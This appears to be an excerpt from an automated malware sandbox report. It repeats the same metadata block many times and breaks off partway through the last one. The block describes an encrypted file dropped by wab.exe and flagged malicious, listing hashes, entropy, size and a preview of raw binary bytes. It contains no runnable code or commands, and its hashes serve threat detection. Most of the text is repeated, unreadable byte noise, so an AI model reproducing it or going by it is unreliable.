                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
